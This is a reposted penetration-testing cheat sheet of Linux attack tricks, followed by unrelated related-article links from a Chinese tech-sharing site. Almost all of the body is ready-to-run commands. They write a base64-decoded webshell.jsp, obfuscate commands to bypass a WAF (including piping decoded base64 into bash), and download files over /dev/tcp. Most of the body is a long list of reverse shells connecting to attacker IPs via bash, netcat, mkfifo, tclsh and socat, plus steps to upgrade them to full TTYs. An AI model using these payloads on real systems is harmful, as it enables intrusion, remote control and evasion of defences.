Some Linux Hacking Tricks

There is always a method here is useful for you to penetrantion testing :)

Some ways to read system files

 1cat /etc/issue
 2tac /etc/issue
 3less /etc/issue
 4more /etc/issue
 5head /etc/issue
 6tail /etc/issue
 7nl /etc/issue
 8xxd /etc/issue
 9sort /etc/issue
10uniq /etc/issue
11strings /etc/issue
12sed -n '1,10p' /etc/issue
13grep . /etc/issue
14python -c "print(open('/etc/issue').read())"
15perl -F: -lane 'print "@F[0..4]\n"' /etc/issue
16ruby -e 'IO.foreach("/etc/issue"){|a| print a}'
17php -r "echo file_get_contents('/etc/issue');"
18echo $(</etc/issue) or echo `</etc/issue`
19awk '{print $0}' /etc/issue
20base64 -i /etc/issue
21dd count=1000 bs=1 if=/etc/issue 2>/dev/null
22egrep|fgrep|rgrep|agrep "" /etc/issue
23rev /etc/issue
24comm /etc/issue /etc/issue
25paste /etc/issue

Echo a large file to the file System

1echo -n "aGVsbG8gd29ybGQK"|base64 -d > webshell.jsp

Execute commands in bash to bypass waf

1# cat /etc/issue
2$1c$2a$3t$IFS/$4e$5t$6c/$7i$8s$9s$1u$1e 
3{cat,/etc/issue}
4cat<>/etc/issue
5CMD=$'\x20/etc/issue'&&cat$CMD
6echo Y2F0IC9ldGMvaXNzdWU=|base64 -d|bash

Download file without nc&wget

1exec 5<>/dev/tcp/ip/port &&echo -e "GET /filename HTTP/1.0\n" >&5 && cat<&5 > filename

Create An Interactive Shell

 1# Use Bash
 2$ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1
 3$ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196
 4$ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line; do $line 2>&5 >&5;done
 5$ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done
 6
 7# Use Netcat
 8$ nc -e /bin/sh 192.168.68.206 2333  
 9$ mkfifo fifo ; nc.traditional -u 192.168.199.199 5555 < fifo | { bash -i; } > fifo
10$ nc 192.168.199.199 5555 -c /bin/bash
11$ if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.199.199 5555 > /tmp/f
12$ if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc 192.168.199.199 5555 0</tmp/f|/bin/bash 1>/tmp/f
13$ nc 192.168.68.206 2333|/bin/sh|nc 192.168.68.206 2444  
14
15# Use TCHsh
16$ echo 'set s [socket 192.168.199.199 5555];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh # tcp
17
18# Use Socat
19$ socat tcp-connect:192.168.199.199:5555 exec:"bash -li",pty,stderr,setsid,sigint,sane # tcp
20
21## Full list please read my blog
22## http://reverse-tcp.xyz/2017/01/08/Some-Ways-To-Create-An-Interactive-Shell-On-Linux/

Use rlwrap to run netcat and create a listening port

1# Allow the editing of keyboard input for any other command.
2rlwrap -S "$(printf '\033[95mFS>\033[m ')" nc -lvvp 4444

Upgrading simple shells to fully interactive TTYs

 1## use Python to spawn a pty
 2python -c 'import pty; pty.spawn("/bin/bash")'
 3
 4## Using socat
 5# Socat is like netcat and it can be used to pass full TTY's over TCP connections.
 6# If socat isn't installed, you can download id from here : https://github.com/andrew-d/static-binaries
 7# On Attack Host
 8socat file:`tty`,raw,echo=0 tcp-listen:4444 
 9# On Victim
10socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
11
12## Using Expect
13cat sh.exp
14#!/usr/bin/expect
15# Spawn a shell, then allow the user to interact with it.
16# The new shell will have a good enough TTY to run tools like ssh, su and login
17spawn sh
18interact
19# In reverse shell
20expect sh.exp
21
22## Using stty options
23#
24# In reverse shell
25python -c 'import pty; pty.spawn("/bin/bash")'
26Ctrl-Z
27# In attack shell
28stty raw -echo
29fg
30# In reverse shell
31reset
32export SHELL=bash
33export TERM=xterm-256color
34stty rows <num> columns <cols>

One command to locate the web path

1find / -type f -name "*.*" | xargs grep "htmlstring"

原文发布于微信公众号 - 逢魔安全实验室(FormSec)

原文发表时间:2018-05-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏张善友的专栏

MS 的IOC容器(ObjectBuilder)?

MS 的 Net Framework 2.0的Enterprise Library - November 2005 CTP 和Composite User I...

2057
来自专栏杨建荣的学习笔记

巧用shell脚本统计磁盘使用情况(r4笔记第12天)

在系统环境中存在大量的文件时,统计磁盘空间的工作变得尤为重要。 首先是传统的文件统计,通常使用-s选项,但是只能得到一个概要的信息,如果想定位哪些文件消耗的空间...

3137
来自专栏ml

flume安装及配置介绍(二)

注: 环境: skylin-linux Flume的下载方式:   wget http://www.apache.org/dyn/closer.lua/flu...

35711
来自专栏bboysoul

社会工程学信息收集工具(Userrecon)

这个工具最主要的功能就是可以让你在知道用户名的情况下批量去各个社交网站上查找这个用户名的主页,方便收集对象的主页

3954
来自专栏一个会写诗的程序员的博客

React.js 集成 Kotlin Spring Boot 开发 Web 应用实例详解工程源代码参考文章

React.js 集成 Kotlin Spring Boot 开发 Web 应用实例详解

1642
来自专栏happyJared

Spring Boot几种启动问题的解决方案

  使用Spring Boot以来,遇到和解决过好几次不同的项目启动问题,大多数事故起于错误的配置和依赖。因此,本文用于汇总这些问题,以及提供相应的解决方案,帮...

9691
来自专栏颇忒脱的技术博客

Spring MVC异步处理简介

本文讲到的所有特性皆是基于Servlet 3.0 Async Processing的,不是基于Servlet 3.1 Async IO的。

3613
来自专栏一个会写诗的程序员的博客

《Spring Boot极简教程》第7章 Spring Boot集成模板引擎

其实,没有任何一个模板引擎(jsp,velocity,thymeleaf,freemarker,etc)可以完全实现MVC绝对的分层,只有“自由度”上的界定罢了...

1134
来自专栏一个会写诗的程序员的博客

《Springboot极简教程》继承WebMvcConfigurerAdapter: 一行代码写Controller文章概要常用的写Controller类方法继承 WebMvcConfigurerAd

要添加一个新页面访问总是要新增一个Controller或者在已有的一个Controller中新增一个方法,然后再跳转到设置的页面上去。考虑到大部分应用场景中Vi...

701
来自专栏cloudskyme

Could not find artifact com.sun:tools:jar:1.5.0

【maven package】,则依然报错,但报的是另外一个错误: [INFO] Scanning for projects…[INFO]           ...

3184

扫码关注云+社区

领取腾讯云代金券